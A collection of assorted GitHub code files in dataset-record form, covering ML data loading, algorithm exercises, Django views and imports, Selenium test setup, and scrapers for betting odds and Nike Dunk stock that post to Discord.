'split3']#,'split4']\n for split in splits:\n #print(split)\n FOLDER='./data/intermediate_results/models/output_models/{}/{}/'.format(gene,split)\n file = open(\"{}attention_values_{}.csv\".format(FOLDER,split),'r')\n csvs[split]=file\n test_images_list = open(\"{}attention_cases_{}.csv\".format(FOLDER,split),'r').readlines()\n ensemble_attention_record = open(\"./results/intermediate_results/models/output_models/{}/ensemble_attention_record.csv\".format(gene), 'w')\n labels_file_lines = open(\"./data/splits/normalized/test/{}_test.csv\".format(gene),\"r\").readlines()\n n_patches_per_case=np.load(\"./data/test_files_infolders.npy\", allow_pickle=True).item()\n\n cases=[]\n labels=[]\n labels_dic={}\n for line in labels_file_lines:\n case=line.split(',')[0]\n cases.append(case)\n labels_dic[case]=float(line.split(', ')[1].strip('\\n'))\n labels.append(float(line.split(', ')[1].strip('\\n')))\n hist, bin_edges = np.histogram(labels, bins=7)\n\n values=np.zeros(86830)\n\n for file_index in range(0,86830):\n for split in splits:\n values[file_index]+=float(csvs[split].readline())\n values[file_index]/=len(splits)\n\n for file_index in range(0,86830):\n file_name = test_images_list[file_index].strip('\\n')\n case_id = file_name.split('10x/')[1]\n case_id = case_id[:12]\n label = labels_dic[case_id]\n bin_idx, min_edge, max_edge = assign_case_to_bin(label, bin_edges)\n ensemble_attention_value = values[file_index]\n n_patches = n_patches_per_case[case_id]\n ensemble_attention_record.write(f\"{file_name}, {case_id}, {label}, {bin_idx}, {min_edge}, {max_edge}, {ensemble_attention_value}, {n_patches}\\n\")\n\n ensemble_attention_record.close()\n for k in csvs.keys():\n csvs[k].close()\n","repo_name":"maragraziani/interpretableWSItoRNAseq","sub_path":"code/interpretability/create_attention_record.py","file_name":"create_attention_record.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"177631853","text":"from typing import Union\nimport numpy as np\nimport tensorflow as tf\nimport pandas as pd\nimport tqdm\n\nfrom typing import (\n List as list, \n Tuple as tuple, \n Dict as dict\n)\n\nimport sys\nsys.path.append(\"../\")\n\nimport utils # type: ignore\n# from .. import utils # for autocompletion purposes\n\ndef load_data(path: str) -> tuple[\n Union[list[str], dict[str, int]],\n pd.DataFrame\n ]:\n data = pd.read_parquet(path)\n classes: Union[list[str], dict[str, int]] = data.detection_object.unique()\n classes = {_class: i for i, _class in enumerate(classes)}\n data.detection_object = data.detection_object.map(classes)\n classes = {i: _class for _class, i in classes.items()}\n return classes, data\n\n\ndef create_tf_datasets(\n paths: list[str],\n bboxes_classes: list[tuple[float, float, float, float, int]]\n ) -> tf.data.Dataset:\n paths_tf = tf.data.Dataset.from_tensor_slices(paths)\n bboxes_classes_tf = tf.data.Dataset.from_tensor_slices(bboxes_classes)\n return tf.data.Dataset.zip(\n (paths_tf, bboxes_classes_tf)\n )\n\n\ndef path_to_image(path: str) -> np.uint8:\n image = utils.read_image(f\".{path.numpy().decode('utf-8')}\")\n image = utils.resize_dimensions(image, (448, 448))\n return image\n\n\ndef detection_to_grid(\n bbox_class: tuple[float, float, float, float, int],\n S: int = 7, B: int = 2, C: int = 20) -> np.ndarray:\n grid_detection = np.zeros((S, S, C + 5 * B))\n ##################################################################\n # #\n #[20 grids ~~ classes, 2 bounding boxes [x, y, w, h, confidence]]#\n # #\n ##################################################################\n for *bounding_box, detection_class in bbox_class.numpy():\n detection_class = detection_class.astype(np.uint8)\n grid_x = int(np.floor(S * bounding_box[0]))\n grid_y = int(np.floor(S * bounding_box[1]))\n if not (grid_x == 7 or grid_y == 7):\n if grid_detection[grid_y, grid_x, 20] == 0:\n # Set that there exists an object\n grid_detection[grid_y, grid_x, 20] = 1\n grid_detection[grid_y, grid_x, 21:25] = bounding_box\n grid_detection[grid_y, grid_x, detection_class] = 1 \n return grid_detection\n\ndef VOCDataLoader() -> tf.data.Dataset:\n data_path = \"VOC_2012_detections.parquet\"\n classes, data = load_data(data_path)\n paths = []\n bboxes_classes = []\n for path, group in tqdm.tqdm(data.groupby(\"path\")):\n paths.append(path)\n bboxes_classes.append(group[['x_yolo', 'y_yolo', 'w_norm', 'h_norm', 'detection_object']].values)\n paths = tf.constant(paths)\n bboxes_classes = tf.ragged.constant(bboxes_classes)\n\n dataset = create_tf_datasets(paths, bboxes_classes)\n dataset = dataset.map(\n lambda path, bbox_class: (\n tf.py_function(\n func=path_to_image,\n inp=[path],\n Tout=tf.float32\n ), bbox_class)\n ).map(\n lambda image, bbox_class: (image,\n tf.py_function(\n func=detection_to_grid,\n inp=[bbox_class],\n # adding square brackets to Tout type adds dimension # DON'T\n Tout=tf.float32 \n ))\n ).batch(16)\n\n return dataset\n\n\nif __name__ == \"__main__\":\n data_path = \"VOC_2012_detections.parquet\"\n classes, data = load_data(data_path)\n paths = data[['path']].values\n bboxes = data[['x_yolo', 'y_yolo', 'w_norm', 'h_norm']].values\n detection_classes = data[['detection_object']].values\n for index, (name, group) in enumerate(data.groupby(\"path\")):\n image = utils.visualize_bounding_boxes(\n utils.read_image(f\".{name}\"), \n group[['xmin', 'ymin', 'xmax', 'ymax', 'detection_object']].values,\n classes\n )\n image = utils.show_image(image)\n if index == 10:\n break\n","repo_name":"Marvin-desmond/yolo-v1-unified-detection","sub_path":"TensorFlow_YOLO1/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27326857575","text":"def SVD(mat, initial_mat1, initial_mat2, learn_rate, iterations):\n ## reassigning values in order to keep code clean\n # the m by n matrix that we want to approximate\n A = mat\n # two matrices from which we will start: B is m by k\n B = initial_mat1\n # C is n by k\n C = initial_mat2\n # learning rate, or step of learning\n alpha = learn_rate\n # number of iterations\n N = iterations\n # A ~ B * C^t : the first approximation based on given initial matrices\n A_app = np.dot(B, C.T)\n # gradient descent\n for i in range(N):\n # partial derivatives for matrices\n dLdB = np.dot((A_app - A), C)\n dLdC = np.dot((A_app - A).T, B)\n # updating matrices\n C = C - alpha * dLdC\n B = B - alpha * dLdB\n # calculating approximated matrix\n A_app = np.dot(B, C.T)\n # returning two matrices that can be used for A approximation\n return B, C, A_app\n","repo_name":"NikitaKudin/ml","sub_path":"L9/SVD.py","file_name":"SVD.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"19817652723","text":"numbers = [7, 0, 8, 2, 8, 3, 1, 5, 7, 6, 2] \nhand = \"left\"\nanswer = ''\nlefthand = 10\nrighthand = 12\nfor i in numbers:\n if i == 0:\n i = 11\n\n\n if (i == 3 or i == 6 or i == 9):\n \n answer += 'R'\n righthand = i\n elif (i == 1 or i == 4 or i == 7):\n answer += 'L'\n lefthand = i\n else:\n ledis = abs(i - lefthand) // 3 + abs(i - lefthand) % 3\n ridis = abs(i - righthand) // 3 + abs(i - righthand) % 3\n\n if ledis > ridis:\n answer += 'R'\n righthand = i\n elif ledis < ridis:\n answer += 'L'\n lefthand = i\n else:\n if hand == \"right\":\n answer += 'R'\n righthand = i\n elif hand == \"left\":\n answer += 'L'\n lefthand = i\n\n\n\n\n\n\n\n\nprint(answer)\n\n\n\n","repo_name":"jhl9617/Algorithms","sub_path":"프로그래머스/키패드 누르기.py","file_name":"키패드 누르기.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8269864790","text":"n = int(input())\narray = list(map(int, input().split()))\nsum_value = sum(array)\nif sum_value % 4:\n print(0)\nelse:\n cnt = [0] * 4\n cnt[0] = 1\n prefix_sum = 0\n division = sum_value // 4\n for i in range(n - 1):\n prefix_sum += array[i]\n if prefix_sum == 3 * division:\n cnt[3] += cnt[2]\n if prefix_sum == 2 * division:\n cnt[2] += cnt[1]\n if prefix_sum == 1 * division:\n cnt[1] += cnt[0]\n print(cnt[3])\n","repo_name":"s2lee/PS","sub_path":"BOJ/Prefix Sum/21757.py","file_name":"21757.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16035496673","text":"import sys\n\ndef main():\n\n # initial filenames\n script_name = ''\n input_one = ''\n input_two = ''\n name = ''\n\n # get args\n if len(sys.argv) == 3:\n print('number of arguments: ', len(sys.argv))\n script_name = sys.argv[0]\n input_one = sys.argv[1]\n input_two = sys.argv[2]\n else:\n print('ERROR: WRONG ARGUMENTS')\n sys.exit(0)\n\n compare(input_one, input_two)\n\ndef compare(input_one, input_two):\n\n print('-- compare called --')\n\n input_one_count = 0\n input_two_count = 0\n\n with open(input_one) as f:\n for line in f:\n #print (line)\n\n if '= 0:\n im_manhattan = im\n # if plots.hl:\n # im_manhattan = im_hl.copy()\n # else:\n # im_manhattan = im.copy()\n draw = ImageDraw.Draw(im_manhattan)\n u0 = width / 2\n v0 = height / 2\n if z[1] > v0:\n posy = 0\n else:\n posy = height\n\n if confident == 3:\n pt1 = (u0, posy)\n pt2 = (manh_vps[0, 0], manh_vps[0, 1])\n draw.line((pt1, pt2), fill=tuple([255, 0, 0]), width=4)\n pt2 = (manh_vps[1, 0], manh_vps[1, 1])\n draw.line((pt1, pt2), fill=tuple([0, 255, 0]), width=4)\n pt2 = (manh_vps[2, 0], manh_vps[2, 1])\n draw.line((pt1, pt2), fill=tuple([0, 0, 255]), width=4)\n elif confident == 2:\n pt1 = (u0, posy)\n pt2 = (manh_vps[0, 0], manh_vps[0, 1])\n draw.line((pt1, pt2), fill=tuple([255, 0, 0]), width=1)\n pt2 = (manh_vps[1, 0], manh_vps[1, 1])\n draw.line((pt1, pt2), fill=tuple([0, 255, 0]), width=4)\n pt2 = (manh_vps[2, 0], manh_vps[2, 1])\n draw.line((pt1, pt2), fill=tuple([0, 0, 255]), width=4)\n elif confident == 1:\n pt1 = (u0, posy)\n pt2 = (manh_vps[0, 0], manh_vps[0, 1])\n draw.line((pt1, pt2), fill=tuple([255, 0, 0]), width=1)\n pt2 = (manh_vps[1, 0], manh_vps[1, 1])\n draw.line((pt1, pt2), fill=tuple([0, 255, 0]), width=1)\n pt2 = (manh_vps[2, 0], manh_vps[2, 1])\n draw.line((pt1, pt2), fill=tuple([0, 0, 255]), width=4)\n\n im_manhattan.save('tmp/im_manhattan.jpg')\n\n # save the results image\n\n if plots.hvps and todo.save_results_image:\n img_path = imageList[i]\n [pathstr, img_name] = os.path.split(img_path)\n name = os.path.splitext(img_name)[0]\n name = './intermediate/' + name + 'res.png'\n im.save(name)\n\n # ortho-rectify all vertical planes\n\n if todo.ortho_rectify:\n K = np.array([])\n if focal > 0:\n K = np.array([[focal, 0.0, width / 2], [0.0, focal, height / 2], [0.0, 0.0, 1.0]])\n hl_homo = line_hmg_from_two_points(np.array([hl[0, 0], hl[0, 1]]), np.array([hl[1, 0], hl[1, 1]]))\n\n\n [imR, maskR, transform, crop_imR] = orthorectify_from_vps_and_lines(im_array, im_useless, hvps, hvp_groups, z, z_group, ls, 4, K, hl_homo, 0)\n\n # imR = orthorectify_from_vps_and_lines(im_array, im_useless, hvps, hvp_groups, z, z_group, ls, 4, K, hl_homo, 0)\n\n\n # if len(imR) > 0:\n # if len(imR[0]) != 0:\n # zhupei_save[i].append(transform[0][\"H\"].tolist())\n # if len(imR) > 1:\n # if len(imR[1]) != 0:\n # zhupei_save[i].append(transform[1][\"H\"].tolist())\n # if len(imR) > 2:\n # if len(imR[2]) != 0:\n # zhupei_save[i].append(transform[2][\"H\"].tolist())\n\n\n if todo.save_ortho_images:\n img_path = imageList[i]\n [pathstr, img_name] = os.path.split(img_path)\n name = os.path.splitext(img_name)[0]\n black_percentage = []\n index_list = []\n\n for j in range(len(imR)):\n if len(imR[j]) != 0:\n\n if not os.path.exists('./output/'):\n os.makedirs('./output/')\n out_img_name = './output/' + name + '_R_' + str(j) + '.jpg'\n skimage.io.imsave(out_img_name, maskR[j])\n\n\n\n # for j in range(len(imR)):\n # if len(imR[j]) != 0:\n # black_percentage.append(1 - maskR[j].mean())\n # index_list.append(j)\n # if len(index_list) > 0:\n # output_num = 0\n # if np.array(black_percentage).min() < 0.5 * black_percentage[0] and black_percentage[0] > 0.15:\n # output_num = index_list[np.argmin(black_percentage)]\n # out_img_name = './output/manual_selection' + name + '_R_' + str(output_num) + '.jpg'\n # skimage.io.imsave(out_img_name, imR[output_num])\n # # break\n # # mask_img_name = './mask/' + name + '_R_' + str(output_num) + '.jpg'\n # # skimage.io.imsave(mask_img_name, maskR[output_num])\n # # crop_img_name = './crop_output/' + name + '_R_' + str(output_num) + '.jpg'\n # # skimage.io.imsave(crop_img_name, crop_imR[output_num])\n #\n #\n # out_img_name = './output/' + name + '_R_' + str(0) + '.jpg'\n # skimage.io.imsave(out_img_name, imR[0])\n # # break\n # # mask_img_name = './mask/' + name + '_R_' + str(0) + '.jpg'\n # # skimage.io.imsave(mask_img_name, maskR[0])\n # # crop_img_name = './crop_output/' + name + '_R_' + str(0) + '.jpg'\n # # skimage.io.imsave(crop_img_name, crop_imR[0])\n\n\n\n\n\n\n # with open('simon_zenith.json', 'w') as f:\n # json.dump(zhupei_save, f)\n\n\n\n#print(todo.save_results_image)","repo_name":"ZPdesu/lsaa-dataset","sub_path":"Panorama_Rectification/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":9594,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"21"} +{"seq_id":"35234007672","text":"from datetime import date\nimport pandas as pd\nimport os\n\nos.environ['DJANGO_SETTINGS_MODULE'] = 'vlaio_prototype.settings'\nimport django\n# before importing any model\ndjango.setup()\n\nfrom main.models import Company, Interaction, Partner\n\nfrom .vat_normilze import normalize, is_vat\nfrom . import checkers\n\n\nclass Config:\n def __init__(self, xl_to_sql, model_class, xl_types=None, map_df_func=None, checkers=None):\n self.xl_to_sql = xl_to_sql\n self.xl_types = xl_types\n self.xl_cols = set(xl_to_sql.keys())\n self.model_class = model_class\n self.map_df_func=map_df_func\n self.checkers = checkers or []\n\n def insert_models(self, df):\n if self.map_df_func is not None:\n df = self.map_df_func(df)\n dicts = df.to_dict('records')\n self.model_class.objects.bulk_create(\n [\n self.model_class(**{self.xl_to_sql[k]: d[k] for k in self.xl_cols})\n for d in dicts\n ]\n )\n \n def check(self, df):\n \"\"\"\n return a tuple of (errors, warnings)\n \"\"\"\n res = filter(lambda x: x, [f(df) for f in self.checkers])\n warnings = []\n errors = []\n for txt, is_warning in res:\n if is_warning:\n warnings.append(txt)\n else:\n errors.append(txt)\n return errors, warnings\n\n def insert_from_excel(self, file_path):\n df = self.get_data_from_excel_file(file_path)\n self.insert_models(df)\n\n def get_data_from_excel_file(self, file_path):\n df = pd.read_excel(\n file_path,\n encoding='sys.getfilesystemencoding()',\n dtype=self.xl_types\n )\n present = set(df.columns)\n missing = self.xl_cols - present\n if missing:\n raise ValueError(\"Missing columns: \" + \",\".join(missing))\n additional = present - self.xl_cols\n for col in additional:\n del df[col]\n\n return df\n\n\n\n\ndef map_company_vat(df):\n df[\"VAT\"] = df[\"VAT\"].apply(normalize)\n return df\n\n\nCOMPANY_CONFIG = Config(\n xl_to_sql={\n # In file name: db column name\n \"Naam\": \"name\",\n \"VAT\": \"vat\",\n \"werknemers\": \"employees\",\n \"winst\": \"profit\"\n },\n xl_types={\n \"Naam\": str,\n \"VAT\": str,\n \"werknemers\": int,\n \"winst\": int\n },\n model_class=Company,\n map_df_func=map_company_vat,\n checkers=[checkers.check_tva, checkers.check_empty_col(\"Naam\")]\n)\n\n\ndef map_df_interactions(df: pd.DataFrame):\n sources = {\n name: Partner.objects.get_or_create(name=name)[0]\n for name in set(df['Source'])\n }\n df[\"Source\"] = df[\"Source\"].apply(lambda x: sources[x].id)\n # TODO change the date\n df['date'] = date.today()\n df[\"VAT\"] = df[\"VAT\"].apply(normalize)\n return df\n\n\n\nINTERACTION_CONFIG = Config(\n xl_to_sql={\n \"VAT\": \"company_id\",\n \"Source\": 'partner_id',\n \"Type\": \"type\",\n \"Date\": \"date\"\n },\n xl_types={\n \"Source\": str,\n \"Type\": str,\n \"VAT\": str,\n \"date\": date\n },\n model_class=Interaction,\n map_df_func=map_df_interactions,\n checkers=[\n checkers.check_new_parnter,\n checkers.check_new_types,\n checkers.check_empty_col(\"Source\"),\n checkers.check_new_vat,\n checkers.check_tva\n ]\n)\n","repo_name":"oSoc18/vlaio-network-backend","sub_path":"excel_parse/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"28901952193","text":"import os.path\n\nimport pytest\nfrom selenium.webdriver.chrome import webdriver\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.edge.service import Service\nfrom selenium.webdriver.ie.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom webdriver_manager.microsoft import EdgeChromiumDriverManager\nfrom webdriver_manager.microsoft import IEDriverManager\ndriver = None\n\n\n@pytest.fixture(autouse=True)\ndef setup(request, browser):\n global driver\n if browser == \"Chrome\" or \"CHROME\":\n driver = webdriver.Chrome(service=Service(ChromeDriverManager().install()))\n elif browser == \"ie\" or \"IE\":\n driver = webdriver.Ie(service=Service(IEDriverManager().install()))\n elif browser == \"Edge\" or \"edge\":\n driver = webdriver.Edge(service=Service(EdgeChromiumDriverManager().install()))\n else:\n print(\"PLease Pass the correct browser name :\")\n driver.maximize_window()\n driver.get(\"https://www.yatra.com/\")\n request.cls.driver = driver\n yield\n driver.close()\n\n\ndef pytest_addoption(parser):\n parser.addoption(\"--browser\", action=\"store\", default=\"Chrome\")\n\n\n@pytest.fixture(scope=\"class\", autouse=True)\ndef browser(request):\n return request.config.getoption(\"--browser\")\n\n\n@pytest.hookimpl(hookwrapper=True)\ndef pytest_runtest_makereport(item):\n pytest_html = item.config.pluginmanager.getplugin(\"html\")\n outcome = yield\n report = outcome.get_result()\n extra = getattr(report, \"extra\", [])\n if report.when == \"call\":\n # always add url to report\n extra.append(pytest_html.extras.url(\"https://www.yatra.com/\"))\n xfail = hasattr(report, \"wasxfail\")\n if (report.skipped and xfail) or (report.failed and not xfail):\n # only add additional html on failure\n report_directory = os.path.dirname(item.config.option.htmlpath)\n file_name = report.nodeid.replace(\"::\", \"_\") + \".png\"\n destinationFile = os.path.join(report_directory, file_name)\n driver.save_screenshot(destinationFile)\n if file_name:\n html = '
    \"screenshot\"
    ' % file_name\n extra.append(pytest_html.extras.html(html))\n report.extra = extra\n\n\ndef pytest_html_report_title(report):\n report.title = \"Yatra Report\"","repo_name":"Ashish1225/selenium-python-automation-demo","sub_path":"testcases/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37708802370","text":"import datetime\nimport time\nimport requests\nimport os\nimport django\nfrom pprint import pprint\n\nos.environ['DJANGO_SETTINGS_MODULE'] = 'settings.settings'\ndjango.setup()\nfrom stremstv.models import Event, League\n\nSTATISTICS_ID = {\n 'Футбол': {\n 45: 'Атаки',\n 58: 'Опасные атаки',\n 29: 'Владение мячом',\n 59: 'Удары в створ',\n 60: 'Удары в сторону ворот',\n 70: 'Угловые',\n 26: 'Жёлтые карточки',\n 71: 'Красные карточки',\n 72: 'Пенальти',\n },\n 'Хоккей': {\n 45: 'Атаки',\n 17: 'Броски',\n 18: 'Штрафы',\n 20: 'Владение',\n },\n}\nTABLE_MARKETS_IDS = {\n 1: {\n 'Название': 'Исход',\n 1: 'П1',\n 2: 'X',\n 3: 'П2'\n },\n 8: {\n 'Название': 'Двойной шанс',\n 4: 'X1',\n 5: '12',\n 6: 'X2',\n },\n 17: {\n 'Название': 'Тотал',\n 9: 'Больше',\n 10: 'Меньше'\n },\n 2: {\n 'Название': 'Фора',\n 7: 'Фора 1',\n 8: 'Фора 2'\n },\n 15: {\n 'Название': 'Тотал ком.1',\n 12: 'Меньше',\n 11: 'Больше'\n },\n 62: {\n 'Название': 'Тотал ком.2',\n 13: 'Больше',\n 14: 'Меньше'\n }\n}\n\n\ndef scan_xbet():\n with requests.Session() as session:\n api = 'https://1xstavka.ru/LineFeed/Get1x2_VZip?sports=1,2,3,4,6,9,19,26,56,189&count=5000&tf=2200000&tz=3&antisports=188&mode=4&country=1&partner=51&getEmpty=true'\n while True:\n response = session.get(api).json()\n for i in response['Value']:\n league = i['L']\n if 'x' in league:\n continue\n elif 'CN' not in i:\n continue\n country = i['CN']\n sport = i['SN']\n if League.objects.filter(sport=sport, country=country, league=league, include=False).exists():\n continue\n elif not League.objects.filter(sport=sport, country=country, league=league).exists():\n League.objects.create(sport=sport, country=country, league=league)\n continue\n elif League.objects.filter(sport=sport, country=country, league=league, exclude=True).exists():\n include = False\n else:\n include = True\n home = i.get('O1')\n away = i.get('O2')\n if sport in ['Биатлон', 'Формула 1']:\n if 'Биатлон' in sport:\n logo = 'https://w7.pngwing.com/pngs/513/262/png-transparent-skiing-ski-superhero-sports-equipment-fictional-character.png'\n else:\n logo = 'https://w7.pngwing.com/pngs/749/255/png-transparent-formula-1-logo-abu-dhabi-grand-prix-2018-fia-formula-one-world-championship-european-grand-prix-logo-auto-racing-formula-1-miscellaneous-text-trademark.png'\n home, away = sport, sport\n home_logo, away_logo = logo, logo\n elif not home and not away:\n continue\n else:\n home_logo = 'https://cdn.1xstavka.ru/sfiles/logo_teams/' + i['O1IMG'][0] if i['O1IMG'] else None\n away_logo = 'https://cdn.1xstavka.ru/sfiles/logo_teams/' + i['O2IMG'][0] if i['O2IMG'] else None\n status = 'prematch'\n start = datetime.datetime.fromtimestamp(i['S'])\n markets = {}\n if 'E' in i:\n for m in i['E']:\n if m['G'] not in TABLE_MARKETS_IDS:\n continue\n m2 = TABLE_MARKETS_IDS[m['G']]\n if m2['Название'] not in markets:\n markets[m2['Название']] = {}\n if 'P' in m:\n if m['P'] not in markets[m2['Название']]:\n markets[m2['Название']][str(m['P'])] = {m2[m['T']]: m['C']}\n else:\n markets[m2['Название']][str(m['P'])][m2['T']] = m['C']\n else:\n markets[m2['Название']][m2[m['T']]] = m['C']\n if 'MIO' in i:\n stage = i['MIO'].get('TSt')\n else:\n stage = None\n if Event.objects.filter(sport=sport, country=country, league=league, home=home, away=away, start__date=start.date()).exists():\n event = Event.objects.get(sport=sport, country=country, league=league, home=home, away=away, start__date=start.date())\n event.start = start\n event.status = status\n event.markets = markets\n event.save()\n else:\n Event.objects.create(\n xbet_id=i['I'],\n sport=sport,\n country=country,\n league=league,\n stage=stage,\n home=home,\n away=away,\n home_logo=home_logo,\n away_logo=away_logo,\n status=status,\n start=start,\n markets=markets,\n include=include,\n )\n time.sleep(30)\n\n\nif __name__ == '__main__':\n while True:\n try:\n scan_xbet()\n except requests.exceptions.ConnectionError:\n continue\n","repo_name":"mamberger/varline","sub_path":"spider_prematch.py","file_name":"spider_prematch.py","file_ext":"py","file_size_in_byte":5928,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"19184133512","text":"# 직사각형 길이 찾기\n# import sys\n# sys.stdin = open('input.txt','r')\n\nT = int(input())\nfor t in range(1,T+1):\n d = dict()\n num1 = list(map(int,input().split()))\n for i in num1:\n if i not in d:\n d[i] = 1\n else:\n d[i] = d[i] + 1\n\n for key,value in d.items():\n if value == 3:\n break\n elif value == 1:\n break\n print(f'#{t} {(key)}')","repo_name":"Kurman11/TIL","sub_path":"Algorithm/Algorithm_test_02/문제2.py","file_name":"문제2.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38768961052","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .models import Center, CenterReview\nfrom .filters import CenterFilter\nfrom django.contrib import messages\nfrom django.db.models import Q\nfrom users.models import Cart\nfrom .forms import CenterReviewForm\nfrom django.core.paginator import Paginator\n\n# Create your views here.\ndef intro(request):\n return render(request, 'center_intro.html', {})\n\ndef detail(request, id):\n center = get_object_or_404(Center, id=id)\n review = center.center_review.all()\n paginator = Paginator(review, 4)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n try:\n if request.user.is_authenticated:\n cart = Cart.objects.get(user=request.user)\n return render(request, 'center_detail.html', {'center':center, 'cart':cart, 'page_obj':page_obj})\n else:\n return render(request, 'center_detail.html', {'center':center, 'page_obj':page_obj})\n except Exception as e:\n return render(request, 'center_detail.html', {'center':center, 'page_obj':page_obj})\n\ndef filter(request):\n center_list = Center.objects.all()\n center_filter = CenterFilter(request.GET, queryset=center_list)\n try:\n if request.user.is_authenticated:\n cart = Cart.objects.get(user=request.user)\n return render(request, 'center_filter.html', {'filter':center_filter, 'cart':cart})\n else:\n return render(request, 'center_filter.html', {'filter':center_filter})\n except Exception as e:\n return render(request, 'center_filter.html', {'filter':center_filter})\n\ndef view_on_map(request):\n qs = Center.objects.all()\n q = request.GET.get('q', '')\n if q:\n qs = qs.filter(Q(address__icontains=q)|Q(name__icontains=q))\n\n return render(request, 'view_on_map.html', {'center_list':qs, 'q':q})\n\ndef add_review_to_center(request, id):\n if request.user.is_authenticated:\n center = get_object_or_404(Center, id=id)\n if request.method == \"POST\":\n form = CenterReviewForm(request.POST)\n if form.is_valid():\n review = form.save(commit=False)\n review.center = center\n review.author = request.user.username\n review.save()\n return redirect('center_detail', id=center.id)\n else:\n form = CenterReviewForm()\n messages.warning(request, \"유효하지 않은 형식입니다. 다시 입력해주세요.\")\n return render(request, 'add_review_to_center.html', {'form':form})\n else:\n form = CenterReviewForm()\n return render(request, 'add_review_to_center.html', {'form':form})\n else:\n messages.warning(request, \"로그인 후 이용하실 수 있습니다.\")\n return render(request, 'add_review_to_center.html', {'form':form})\n","repo_name":"jjisol/preranaV1","sub_path":"center/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5636588827","text":"import logging\nimport multiprocessing\nimport random\nimport time\nimport discord as discord\nfrom discord.ext import commands, tasks\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom multiprocessing import Process\n\nimport bot_secrets\n\ndunks_ayer = []\ndunk_nuevas = []\n\n\nnike_page='https://www.nike.com/es/w?q=dunk&vst=dunk'\noptions = webdriver.ChromeOptions()\noptions.binary_location = \"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"\ntoken = bot_secrets.bot_token\nbot = discord.Client()\n\n\n\n@tasks.loop(seconds=10)\nasync def lista_dunks():\n try:\n driver = webdriver.Chrome(ChromeDriverManager().install(), options=options)\n driver.get(nike_page)\n # Aceptar cookies\n WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.XPATH, '//*[@id=\"gen-nav-commerce-header-v2\"]/div[1]/div/div[2]/div/div[2]/div[2]/button'))).click()\n\n scroll_bottom(driver)\n dunks = driver.find_elements(By.CLASS_NAME, 'product-card__img-link-overlay')\n dunks_hoy = [dunk.get_attribute('href') for dunk in dunks if 'high' not in dunk.get_attribute('href')]\n dunks_nuevas = list(filter(lambda dunk: dunk not in dunks_ayer, dunks_hoy))\n global dunks_ayer\n dunks_ayer = dunks_hoy\n print(dunks_nuevas)\n channel = bot.get_channel(1002216168163115172)\n for link in dunks_nuevas:\n await channel.send(link)\n for link in dunks_hoy: #TODO CREAR UNA POOL DE PROCESOS Y QUE CADA PROCESO COMPRUEBE EL STOCK DE LOS PARES QUE PUEDA\n await comprueba_stock(driver,channel,link)\n except Exception as e:\n logging.warning(f\"Excepción con código: {e}\")\n\n\nasync def comprueba_stock(driver, channel, link):\n #driver.get(link)\n driver.get(\"https://www.nike.com/es/launch/t/dunk-low-golden-moss\")\n tallas = driver.find_elements(By.NAME, \"skuAndSize\")\n disponibles = []\n if tallas: # Dos tipos de listings, con nombre skuAndSize y con propiedad size-available\n for talla in tallas:\n if not talla.get_attribute(\"disabled\"):\n atributo = talla.get_attribute(\"id\")\n disponibles.append(driver.find_element(By.XPATH,f\"//*[@for='{atributo}']\").text)\n\n else:\n tallas = driver.find_elements(By.XPATH, \"//*[@data-qa='size-available']\")\n for talla in tallas:\n disponibles.append(talla.text)\n\n if disponibles:\n await channel.send(link + \"\\n\" + \"\\n\".join(disponibles))\n else:\n await channel.send(link + \"\\nSin stock\")\n\n\n\nasync def work(item, count):\n name = multiprocessing.current_process().name\n logging.info(f'{name} started: {item}')\n for x in range(count):\n logging.info(f'{name}: {item} = {x}')\n time.sleep(1)\n logging.info(f'{name} finished')\n return item + ' is finished'\n\nasync def proc_result(result):\n logging.info(f'result = {result}')\n\n\n@bot.event\nasync def on_ready():\n lista_dunks.start()\n\n\ndef scroll_bottom(driver):\n SCROLL_PAUSE_TIME = 0.5\n\n # Get scroll height\n last_height = driver.execute_script(\"return document.body.scrollHeight\")\n\n while True:\n # Scroll down to bottom\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\n # Wait to load page\n time.sleep(SCROLL_PAUSE_TIME)\n\n # Calculate new scroll height and compare with last scroll height\n new_height = driver.execute_script(\"return document.body.scrollHeight\")\n if new_height == last_height:\n break\n last_height = 